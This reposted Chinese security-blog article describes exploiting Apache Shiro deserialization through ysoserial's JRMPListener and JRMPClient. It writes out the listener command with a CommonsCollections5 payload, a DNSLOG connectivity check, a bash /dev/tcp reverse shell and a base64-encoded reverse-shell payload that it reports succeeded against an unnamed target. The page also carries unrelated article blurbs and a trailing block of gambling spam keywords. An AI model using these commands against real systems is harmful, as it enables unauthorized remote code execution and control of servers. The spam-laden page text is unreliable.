吴忠躺衫网络科技有限公司

0
  • 聊天消息
  • 系統消息
  • 評論與回復
登錄后你可以
  • 下載海量資料
  • 學習在線課程
  • 觀看技術視頻
  • 寫文章/發帖/加入社區
會員中心
創作中心

完善資料讓更多小伙伴認識你,還能領取20積分哦,立即完善>

3天內不再提示

使用JRMPClient模塊進行測試

jf_vLt34KHi ? 來源:Tide安全團隊 ? 作者:Tide安全團隊 ? 2022-11-22 17:22 ? 次閱讀

前言

最近在測試中遇到一些shiro反序列化不能利用的情況 找到key 無法找到利用鏈,但是發現存在JRMPClient可用的情況。

b2047198-6a45-11ed-8abf-dac502259ad0.png

換一種工具嘗試

b225dc20-6a45-11ed-8abf-dac502259ad0.png

發現 JRMPClient 可用, 嘗試使用 JRMPClient 進行測試,最終這個目標也沒有執行成功所以換了一個目標進行的嘗試,僅記錄JRMPClient 利用方式。

使用JRMPClient模塊進行測試

找到一個同樣存在shiro反序列的目標。

b237b030-6a45-11ed-8abf-dac502259ad0.png

同樣find: JRMPClient can be use。

搭建JRMPClient 監聽服務

首先需要搭建 JRMPClient 使用ysoserial.jar 工具搭建服務,下載地址:https://github.com/frohoff/ysoserial

使用DNSLOG進行檢測

在不確定目標是否通外網的情況下 先使用DNSLOG進行檢測 獲取一個新的域名 :w3dh1h.dnslog.cn

b24883f6-6a45-11ed-8abf-dac502259ad0.png

VPS上開啟JRMPListener

在VPS上搭建服務命令

java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 6789 CommonsCollections5 "ping w3dh1h.dnslog.cn"

b2716df2-6a45-11ed-8abf-dac502259ad0.png

shiro反序列利用工具中選擇JRMPClient,然后輸入VPS上搭建服務的地址:

b2887efc-6a45-11ed-8abf-dac502259ad0.png

JRMPListener 收到返回信息

b29c67e6-6a45-11ed-8abf-dac502259ad0.png

DNSLOG上收到目標的ping 命令信息 說明目標服務器通外網

b2b75fce-6a45-11ed-8abf-dac502259ad0.png

執行反彈命令

執行反彈命令 bash -i >& /dev/tcp/xxxxxx/8888 0>&1

b6ba1166-6a45-11ed-8abf-dac502259ad0.png

沒有收到反彈鏈接

b6db2266-6a45-11ed-8abf-dac502259ad0.png

將命令進行base64編碼 java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 6789 CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC94eC54eC54eC54eHgvODg4OCAwPiYx}|{base64,-d}|{bash,-i}"

b6f38aae-6a45-11ed-8abf-dac502259ad0.png

成功收到反彈鏈接

b72e021a-6a45-11ed-8abf-dac502259ad0.png

審核編輯:湯梓紅

聲明:本文內容及配圖由入駐作者撰寫或者入駐合作網站授權轉載。文章觀點僅代表作者本人,不代表電子發燒友網立場。文章及其配圖僅供工程師學習之用,如有內容侵權或者其他違規問題,請聯系本站處理。 舉報投訴
  • 模塊
    +關注

    關注

    7

    文章

    2735

    瀏覽量

    47750
  • key
    key
    +關注

    關注

    0

    文章

    51

    瀏覽量

    12860

原文標題:使用JRMPClient模塊進行測試

文章出處:【微信號:Tide安全團隊,微信公眾號:Tide安全團隊】歡迎添加關注!文章轉載請注明出處。

收藏 人收藏

    評論

    相關推薦

    電源模塊測試規范

    1、目的規范二次電源模塊測試方法。本測試規范包括二次電源模塊測試項目、測試目的、接線圖、
    發表于 11-09 10:03 ?83次下載

    怎樣對電源模塊進行可靠性測試

    電源作為電路系統的“心臟”,其重要性是顯而易見的。在選擇電源模塊時,除了要考慮輸入電壓范圍、額定功率、隔離耐壓、效率、紋波&噪聲等性能特性外,還需針對其高低溫性能和降額設計進行可靠性測試
    的頭像 發表于 09-25 11:31 ?1.7w次閱讀
    怎樣對電源<b class='flag-5'>模塊</b><b class='flag-5'>進行</b>可靠性<b class='flag-5'>測試</b>

    電源模塊生產測試必備系統

    n 系統簡介 電源模塊作為電路系統的心臟,它的性能直接影響到整個電路系統的正常運行,因此電源模塊的產品性能就顯得格外重要,對于一款合格的電源模塊,需要進行多項性能參數的
    發表于 11-21 17:00 ?1753次閱讀
    電源<b class='flag-5'>模塊</b>生產<b class='flag-5'>測試</b>必備系統

    對光模塊進行測試的四大步驟

    模塊是由發射器和接收器組成。當發射器通過光纖與接收器連接時,如果整個系統的誤碼率沒有達到預期的效果,是發射器的問題還是接收器的問題?測試模塊一般分為4個步驟,主要分為對發射器和接收器的測試
    的頭像 發表于 12-25 16:27 ?2962次閱讀

    使用示波器對電源模塊進行紋波測量

      在電源模塊物料檢測和某些單板測試時,會使用示波器對電源模塊進行紋波測量,所以需要了解電源紋波的產生、危害,以及示波器各種探頭,用哪種探頭測試
    的頭像 發表于 01-12 16:35 ?8534次閱讀
    使用示波器對電源<b class='flag-5'>模塊</b><b class='flag-5'>進行</b>紋波測量

    使用TPT進行測試建模/測試設計

    TPT中的測試用例用信號特征和函數調用描述被測系統的刺激。您可以用連續的測試步驟對簡單的測試進行建模。對于更復雜的測試用例,TPT提供了混合
    的頭像 發表于 11-25 11:15 ?1097次閱讀
    使用TPT<b class='flag-5'>進行</b><b class='flag-5'>測試</b>建模/<b class='flag-5'>測試</b>設計

    聚焦千兆光模塊和萬兆光模塊測試技術及設備

    本文主要探討了千兆光模塊和萬兆光模塊測試技術及測試設備,讓讀者了解光模塊測試的具體方法。同時,
    的頭像 發表于 11-06 15:00 ?771次閱讀

    電源自動測試系統如何進行電源模塊測試

    電源自動測試系統如何進行電源模塊測試? 電源自動測試系統是用于對電源模塊
    的頭像 發表于 11-09 09:30 ?1029次閱讀

    電源模塊耐壓測試的標準及其規范是什么?要如何測試

    電源模塊耐壓測試的標準及其規范是什么?要如何測試? 電源模塊是電子設備中至關重要的部分,其耐壓測試是確保產品質量和安全性的重要環節。在
    的頭像 發表于 11-10 14:22 ?4620次閱讀

    利用ADPD188BI光學煙霧和氣霧劑檢測模塊進行煙霧測試說明

    電子發燒友網站提供《利用ADPD188BI光學煙霧和氣霧劑檢測模塊進行煙霧測試說明.pdf》資料免費下載
    發表于 11-22 10:13 ?3次下載
    利用ADPD188BI光學煙霧和氣霧劑檢測<b class='flag-5'>模塊</b><b class='flag-5'>進行</b>煙霧<b class='flag-5'>測試</b>說明

    利用ADPD188BI光學煙霧和氣霧劑檢測模塊進行煙霧測試

    電子發燒友網站提供《利用ADPD188BI光學煙霧和氣霧劑檢測模塊進行煙霧測試.pdf》資料免費下載
    發表于 11-23 10:36 ?3次下載
    利用ADPD188BI光學煙霧和氣霧劑檢測<b class='flag-5'>模塊</b>來<b class='flag-5'>進行</b>煙霧<b class='flag-5'>測試</b>

    為什么要進行模塊測試?光模塊測試方案

    為什么要進行模塊測試?光模塊測試方案 光模塊測試
    的頭像 發表于 01-19 11:15 ?1571次閱讀

    如何測試模塊的性能?需要哪些測試測量設備?

    模塊是一種將電信號轉換為光信號或將光信號轉換為電信號的設備,它在光通信系統中起著重要的作用。為了保證光模塊的正常工作,我們需要對其進行性能測試,檢測其是否符合相關的標準和規范。那么,
    的頭像 發表于 01-30 09:03 ?6301次閱讀
    如何<b class='flag-5'>測試</b>光<b class='flag-5'>模塊</b>的性能?需要哪些<b class='flag-5'>測試</b>測量設備?

    什么是光模塊中的浪涌測試

    ,光模塊常常會遭受到來自外部環境的各種干擾,其中包括來自電力系統的浪涌電壓。因此,進行模塊浪涌測試對于確保其穩定性和可靠性至關重要。 浪涌測試
    的頭像 發表于 01-31 14:24 ?852次閱讀

    電源模塊測試系統精準測量:揭秘納米軟件的測試技術

    電源測試系統是針對精密電源、開關電源、工業電源、軍品電源等多種電源模塊特性測試的ate自動化測試設備,旨在綜合檢測電源模塊性能,判斷電源是否
    的頭像 發表于 09-05 18:47 ?363次閱讀
    電源<b class='flag-5'>模塊</b><b class='flag-5'>測試</b>系統精準測量:揭秘納米軟件的<b class='flag-5'>測試</b>技術
    百家乐官网路子分析| 百家乐如何计牌| 澳门百家乐官网赢技巧| 新利娱乐| 凯斯百家乐的玩法技巧和规则| 百家乐五子棋| 至尊百家乐facebook| 做生意的风水朝向| 飞天百家乐官网的玩法技巧和规则| 百家乐官网赢钱的技巧是什么| 高档百家乐官网桌| 百家乐官网龙虎斗等| 百家乐官网最新套路| 固安县| 黄浦区| 菠菜百家乐官网娱乐城| 百家乐官网管理启发书| 百家乐官网看不到视频| 怎样玩百家乐官网赢钱| 百家乐官网如何打公式| 六合彩开码| 博彩娱乐场| 阿城市| 百家乐官网必胜法hk| 广州百家乐官网赌场| 澳门赌百家乐官网能赢钱吗| 中国百家乐官网软件| 百家乐官网博百家乐官网的玩法技巧和规则 | 缅甸百家乐官网赌城| 国际娱百家乐官网的玩法技巧和规则 | 代理百家乐官网试玩| 百家乐官网必胜赌| 不夜城百家乐官网的玩法技巧和规则 | 乐亭县| 百家乐官网一直下注庄家| 百家乐官网犯法| 王子百家乐官网的玩法技巧和规则 | 百家乐官网国际娱乐场| 百家乐官网博弈指| 半圆百家乐桌子| 威尼斯人娱乐网注册|